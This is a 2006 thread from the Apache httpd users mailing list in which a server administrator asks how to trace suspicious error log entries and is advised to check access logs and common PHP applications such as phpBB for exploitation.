Posted to users@httpd.apache.org by "James R. Hay" <jr...@haya.qc.ca> on 2006/01/28 21:55:31 UTC

[users@httpd] Origin of error log entries?

Hi folks,

I sent this last night but didn't see it come through and I realize that I
did not mention that this occurred on a linux server running apache
1.3.34.

Thanks for any advice or suggestions.

Thanks,
Jim.

James R. Hay				jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4

Posted by Joshua Slive <jo...@slive.ca>.
On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:

> Ok, so my intuition that somewhere I should find a corresponding entry in
> an access log for one of the websites is correct, presumably somewhere
> near the time of the timestamp from the error log.

Yes.

> So, this goes more into PHP than Apache but would presumably suggest
> either a script allowing an upload or a query string that was exploited or
> the like.

Yes.

It is most likely an exploit in a standard php application, because
those are much easier to exploit using automated tools.  A problem in
a custom written php script would require more effort to find.  So
check the common problems like phpbb, phpnuke, etc.

Joshua.

Re: [users@httpd] Origin of error log entries?

Posted by "James R. Hay" <jr...@haya.qc.ca>.
Ok, so my intuition that somewhere I should find a corresponding entry in
an access log for one of the websites is correct, presumably somewhere
near the time of the timestamp from the error log.

So, this goes more into PHP than Apache but would presumably suggest
either a script allowing an upload or a query string that was exploited or
the like.

Thanks very much.

Jim.

Posted by Joshua Slive <jo...@slive.ca>.